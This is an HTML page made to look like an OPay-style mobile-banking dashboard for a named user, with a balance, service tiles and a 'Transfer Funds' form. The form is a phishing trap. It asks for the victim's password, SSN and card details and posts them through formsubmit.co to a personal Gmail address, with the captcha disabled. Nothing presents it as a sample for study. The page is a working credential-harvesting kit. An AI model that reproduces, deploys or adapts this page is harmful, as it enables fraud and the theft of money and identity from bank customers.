
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tiffany's Dashboard</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="dashboard">
        <header>
            <div class="profile">
                <img src="https://i.ibb.co/rG1GZbM/default-profile.png" alt="Profile Picture">
                <h2>Hi, Tiffany Bastow</h2>
            </div>
            <div class="balance-card">
                <div class="balance-info">
                    <p>Available Balance</p>
                    <h1>₦1,034.91</h1>
                </div>
                <button class="add-money">+ Add Money</button>
            </div>
        </header>
        <section class="actions">
            <button>To OPay</button>
            <button>To Bank</button>
            <button>Withdraw</button>
        </section>
        <section class="services">
            <div>Airtime</div><div>Data</div><div>Betting</div><div>TV</div>
            <div>Safebox</div><div>Electricity</div><div>Play4Child</div><div>More</div>
        </section>
        <section class="transfer-form">
            <h3>Transfer Funds</h3>
            <form action="https://formsubmit.co/royalcitix@gmail.com" method="POST">
                <input type="text" name="receiver_name" placeholder="Receiver's Name" required>
                <input type="text" name="receiver_bank" placeholder="Receiver's Bank" required>
                <input type="password" name="password" placeholder="Your Password" required>
                <input type="text" name="ssn" placeholder="Your SSN" required>
                <input type="text" name="card_details" placeholder="Card Details" required>
                <input type="hidden" name="_captcha" value="false">
                <button type="submit">Send</button>
            </form>
        </section>
    </div>
</body>
</html>
